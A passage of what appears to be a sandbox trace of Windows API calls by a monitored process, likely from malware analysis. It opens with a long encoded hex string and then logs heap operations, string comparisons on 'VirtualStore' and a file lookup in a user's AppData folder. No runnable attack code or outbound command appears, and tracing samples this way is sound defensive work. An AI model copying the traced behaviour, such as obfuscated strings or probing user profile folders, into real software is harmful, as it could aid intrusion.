8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0251.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0251.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.378] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.379] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0251.379] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.379] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0251.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0251.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VirtualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="irtualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ualStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lStore", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.380] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Store", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0251.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0251.380] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0251.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0251.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0251.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1a) returned 0x24b6b98 [0251.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0251.381] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VirtualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="irtualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ualStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.382] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lStore", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0251.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0251.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0251.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0251.382] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0251.383] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0251.383] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0251.383] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa370 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0251.383] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.383] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.384] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0251.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.384] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0251.384] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.384] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/VirtualStore", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ab32d60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2ab32d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2ab32d60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1220530, dwReserved1=0xb1b2, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0xaa59a0 [0251.385] FindClose (in: hFindFile=0xaa59a0 | out: hFindFile=0xaa59a0) returned 1 [0251.385] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.385] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0251.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0251.385] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.385] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0251.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0251.385] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0251.386] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0251.386] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd 